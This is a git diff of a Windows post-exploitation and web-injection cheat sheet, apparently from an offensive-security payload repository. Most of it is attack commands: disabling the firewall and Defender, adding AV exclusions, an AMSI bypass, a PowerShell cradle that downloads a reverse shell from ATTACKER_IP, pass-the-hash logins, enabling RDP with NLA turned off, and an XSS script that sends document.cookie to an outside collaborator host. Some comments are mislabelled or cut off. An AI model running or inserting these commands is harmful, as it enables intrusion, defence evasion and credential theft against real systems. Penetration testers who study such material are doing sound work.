 Disable firewall
 ```powershell
 netsh firewall set opmode disable
 netsh advfirewall set allprofiles state off
 ```
 List all network shares
 ```powershell
@@ -262,7 +252,7 @@ Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\Securi
 # check status of Defender
 PS C:\> Get-MpComputerStatus
-# disable Real Time Monitoring
+# disable scanning all downloaded files and attachments, disable AMSI (reactive)
 PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
 PS C:\> Set-MpPreference -DisableIOAVProtection $true
@@ -272,19 +262,60 @@ PS C:\> Set-MpPreference -DisableScriptScanning 1
 # exclude a folder
 PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
 PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
 PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
 # remove signatures (if Internet connection is present, they will be downloaded again):
 PS > "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
 ```
 ### Firewall
 List firewall state and current configuration
 ```powershell
 netsh advfirewall firewall dump
 # or 
 netsh firewall show state
 netsh firewall show config
 ```
 List firewall's blocked ports
 ```powershell
 $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
 ```
 Disable firewall
 ```powershell
 # Disable Firewall on Windows 7 via cmd
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server"  /v fDenyTSConnections /t REG_DWORD /d 0 /f
 # Disable Firewall on Windows 7 via Powershell
 powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`
 # Disable Firewall on any windows via cmd
 netsh firewall set opmode disable
 netsh Advfirewall set allprofiles state off
 ```
 ### AppLocker Enumeration
 - With the GPO
 - HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
 List AppLocker rules
 * List AppLocker rules
    ```powershell
    PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
    ```
 * Applocker Bypass
    * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
    * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
    * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
 ### Powershell
 Default powershell locations in a Windows system.
@@ -294,6 +325,22 @@ C:\windows\syswow64\windowspowershell\v1.0\powershell
 C:\Windows\System32\WindowsPowerShell\v1.0\powershell
 ```
 Powershell Constrained Mode
 ```powershell
 # Check if we are in a constrained mode
 $ExecutionContext.SessionState.LanguageMode
 PS > &{ whoami }
 powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
 # PowerShDLL - Powershell with no Powershell.exe via DLL’s
 # https://github.com/p3nt4/PowerShdll
 ftp> rundll32.exe C:\temp\PowerShdll.dll,main
 ```
 Example of AMSI Bypass.
 ```powershell
@@ -307,7 +354,9 @@ PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetF
 C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
 C:\Windows\System32\spool\drivers\color
 C:\Windows\Tasks
-C:\windows\tracing
+C:\Windows\tracing
 C:\Windows\Temp
 C:\Users\Public
 ```
 ## EoP - Looting for passwords
@@ -859,6 +908,7 @@ Then you can use `runas` with the `/savecred` options in order to use the saved
 The following example is calling a remote binary via an SMB share.
 ```powershell
 runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
 runas /savecred /user:Administrator "cmd.exe /k whoami"
 ```
 Using `runas` with a provided set of credential.
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -132,8 +132,12 @@ Require:
 ```powershell
 root@payload$ git clone https://github.com/Hackplayers/evil-winrm
 root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
-root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
+root@payload$ ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
-root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
+root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u username -H BD1C6503987F8FF006296118F359FA79
 root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u username -p password -r domain.local
 *Evil-WinRM* PS > Bypass-4MSI
 *Evil-WinRM* PS > IEX([Net.Webclient]::new().DownloadString("http://127.0.0.1/PowerView.ps1"))
 ```
 or using a custom ruby code to interact with the WinRM service.
@@ -169,6 +173,11 @@ end
 ```powershell
 PS> Enable-PSRemoting
 # use credential
 PS> $pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
 PS> $cred = New-Object System.Management.Automation.PSCredential ('DOMAIN\Username', $pass)
 PS> Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
 # one-to-one interactive session
 PS> Enter-PSSession -computerName DC01
 [DC01]: PS>
@@ -239,54 +248,49 @@ PS C:\> PsExec.exe  \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -
 ## RDP Remote Desktop Protocol 
-Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP)
+:warning: **NOTE**: You may need to enable RDP and disable NLA and fix CredSSP errors.
 ```powershell
 # Enable RDP
 PS C:\> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
 PS C:\> netsh firewall set service remoteadmin enable
 PS C:\> netsh firewall set service remotedesktop enable
 # Alternative
 C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
 root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
 # Fix CredSSP errors
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
 # Disable NLA
 PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").UserAuthenticationRequired
 PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
 ```
 Abuse RDP protocol to execute commands remotely with the following commands;
 * `rdesktop`
    ```powershell
    root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
    root@payload$ rdesktop -u username -p password -g 70% -r disk:share=/tmp/myshare 10.10.10.10
    # -g : the screen will take up 70% of your actual screen size
    # -r disk:share : sharing a local folder during a remote desktop session 
    ```
 * `freerdp` 
    ```powershell
    root@payload$ xfreerdp /v:10.0.0.1 /u:'Username' /p:'Password123!' +clipboard /cert-ignore /size:1366x768 /smart-sizing
    root@payload$ xfreerdp /v:10.0.0.1 /u:username # password will be asked
    # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
    # pass the hash works for Server 2012 R2 / Win 8.1+
    root@payload$ xfreerdp /v:10.0.0.1 /u:username /d:domain /pth:88a405e17c0aa5debbc9b5679753939d  
    ```
 * [SharpRDP](https://github.com/0xthirteen/SharpRDP)
    ```powershell
    PS C:\> SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
    ```
 Or connect remotely with `rdesktop`
 ```powershell
 root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
 root@payload$ rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
 # -g : the screen will take up 70% of your actual screen size
 # -r disk:share : sharing a local folder during a remote desktop session 
 ```
 Note: you may need to enable it with the following command
 ```powershell
 PS C:\> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
 PS C:\> netsh firewall set service remoteadmin enable
 PS C:\> netsh firewall set service remotedesktop enable
 ```
 or with psexec(sysinternals)
 ```powershell
 PS C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
 ```
 or with crackmapexec
 ```powershell
 root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
 ```
 or with Metasploit
 ```powershell
 root@payload$ run getgui -u admin -p 1234
 ```
 or with xfreerdp 
 ```powershell
 root@payload$ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
 root@payload$ xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
 root@payload$ xfreerd /u:runner /v:10.0.0.1 # password will be asked
 ```
 ## Netuse 
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -90,6 +90,18 @@ fclose($fp);
 ?>
 ```
 ### CORS
 ```html
 <script>
  fetch('https://<SESSION>.burpcollaborator.net', {
  method: 'POST',
  mode: 'no-cors',
  body: document.cookie
  });
 </script>
 ```
 ### UI redressing
 Leverage the XSS to modify the HTML content of the page in order to display a fake login form.